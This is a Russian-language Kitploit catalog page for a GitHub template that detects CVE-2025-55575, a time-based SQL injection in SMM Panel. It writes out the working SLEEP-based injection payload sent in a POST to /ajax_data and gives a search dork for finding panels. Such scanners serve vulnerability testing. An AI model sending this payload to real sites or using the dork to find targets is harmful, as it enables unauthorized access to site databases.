Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55575 — Шаблон обнаружения SQL-инъекций на основе времени для SMM Panel. Отправляет сформированные POST-запросы к `/ajax_data` и выявляет уязвимые конечные точки через анализ задержки ответа. | Kitploit
Инструменты/GitHubGitHub/aether-0/cve-2025-55575
Сканеры уязвимостейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubaether-0/cve-2025-55575

CVE-2025-55575

Шаблон обнаружения SQL-инъекций на основе времени для SMM Panel. Отправляет сформированные POST-запросы к `/ajax_data` и выявляет уязвимые конечные точки через анализ задержки ответа.

Репозиторий
0 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

smm-panel-sqli(CVE-2025-55575)

Обнаружение SQL-инъекции с временной задержкой для SMM Panel


Обзор

Этот шаблон обнаруживает SQL-инъекцию с временной задержкой в параметре service_detail SMM Panel через HTTP POST-запросы к /ajax_data. Эксплуатация может позволить удалённым злоумышленникам получить доступ к конфиденциальным данным или повысить привилегии.

  • Автор: Aether
  • Серьёзность: Критическая
  • Теги: sqli, mysql, timing, dork:'intitle:"#1 SMM Panel ****"' "smm panel"
  • Ссылка: https://owasp.org/www-community/attacks/SQL_Injection

Логика обнаружения

Инструмент отправляет подготовленный POST-запрос:

root@kitploit:~
POST /ajax_data
Content-Type: application/x-www-form-urlencoded

action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z

Если время ответа превышает 5 секунд, это указывает на уязвимую конечную точку.

Пример обнаружения

root@kitploit:~
- Method: POST
- Path: {{BaseURL}}/ajax_data
- Headers: Content-Type: application/x-www-form-urlencoded
- Body: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Matcher: duration > 5 seconds

Видеодемонстрация

SQLi PoC

Скачать инструмент